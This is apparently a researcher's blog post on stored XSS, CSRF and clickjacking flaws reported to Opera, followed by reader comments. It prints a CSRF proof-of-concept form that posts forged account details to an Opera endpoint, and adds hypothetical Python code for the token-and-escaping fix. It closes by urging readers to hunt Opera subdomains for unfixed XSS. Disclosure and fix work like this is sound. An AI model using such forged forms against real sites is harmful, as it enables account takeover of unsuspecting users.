
Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera

Nowadays I am not very active in bug bounty programs; however, I still wanted to share my experience with Opera. Opera does not have a bug bounty program, but they certainly have their own way of thanking researchers: they send some swag and list the researcher's name in their Hall of Fame.

I reported a few vulnerabilities to Opera, including a stored XSS, a CSRF and a clickjacking vulnerability. The PoCs for the vulnerabilities are as follows:

Stored XSS

The "Username" input was not being sanitized properly, which resulted in execution of attacker-supplied JavaScript when the stored value was rendered.

CSRF

The account details form had no CSRF token, so an attacker could have used a CSRF attack to change a logged-in user's account details. The PoC form:


    <!-- CSRF PoC as reported: a cross-site POST to the account details endpoint, with no anti-CSRF token required -->
    <form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">
      <input type="hidden" name="email" value="rafaybaloch&#64;gmail&#46;com" />
      <input type="hidden" name="name" value="Rafay&#32;Baloch" />
      <input type="hidden" name="address1" value="f&#45;10&#44;afasf&#32;afs&#32;asf&#32;1&#44;block&#32;15&#32;near&#32;income&#32;tax&#32;office&#44;asssssss&#45;e&#45;johar" />
      <input type="hidden" name="address2" value="" />
      <input type="hidden" name="city" value="Karachi" />
      <input type="hidden" name="state" value="" />
      <input type="hidden" name="country" value="PK" />
      <input type="hidden" name="zip" value="44000" />
      <input type="hidden" name="phone" value="&#43;923333333333" />
      <input type="submit" value="Submit form" />
    </form>
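Added here as an illustration of the fixes for both findings, not Opera's code: a hypothetical Python handler for the account details endpoint that binds an anti-CSRF token to the user's session, checks the request origin, and HTML-escapes the name field on output. The session id, server secret and sample requests are constructed.

```python
import hashlib
import hmac
import html
import secrets
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Constructed per-process server secret; a real deployment keeps this in config.
SECRET_KEY = secrets.token_bytes(32)
# The form's own origin, taken from the PoC's action URL.
ALLOWED_ORIGIN = "https://apps.opera.com"


def mint_csrf_token(session_id: str) -> str:
    """Derive a per-session token; the server embeds it as a hidden field in its own form."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, submitted: Optional[str]) -> bool:
    """A page on another site cannot read the victim's token, so a forged POST fails here."""
    if not submitted:
        return False
    return hmac.compare_digest(mint_csrf_token(session_id), submitted)


def origin_allowed(headers: dict) -> bool:
    """Defence in depth: reject a POST whose Origin/Referer names another site.
    An absent header is tolerated because the token check still applies."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return True
    parts = urlsplit(value)
    return f"{parts.scheme}://{parts.netloc}" == ALLOWED_ORIGIN


def handle_account_details(session_id: str, form: dict, headers: dict) -> Tuple[int, Optional[str]]:
    """Hypothetical hardened handler for account.php?action=details.
    Returns (HTTP status, HTML-escaped name ready to be rendered)."""
    if not origin_allowed(headers):
        return 403, None
    if not csrf_token_valid(session_id, form.get("csrf_token")):
        return 403, None
    # Stored XSS fix: keep the raw value in storage, escape it at every HTML output point.
    safe_name = html.escape(form.get("name", ""), quote=True)
    return 200, safe_name
```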

Opera Hall Of Fame

For my findings, Opera listed my name in their Hall of Fame:

Gift from Opera

As a token of appreciation, they also sent me the following gifts:

Opera is still sending out good stuff. I would recommend that researchers start looking at Opera's subdomains for low-hanging fruit such as XSS; I know there are a lot of unfixed vulnerabilities out there.


  1. How can I get the subdomains of this site?

  2. Hey, hi. Could you please post some guidelines/rules/tricks on how you work on bug bounty programs? I would really appreciate that. Thanks a lot!

  3. Could you briefly explain the XSS which you found?

  4. Nice work bro, keep it up :)


© 2016 All Rights Reserved by RHA Info Sec.
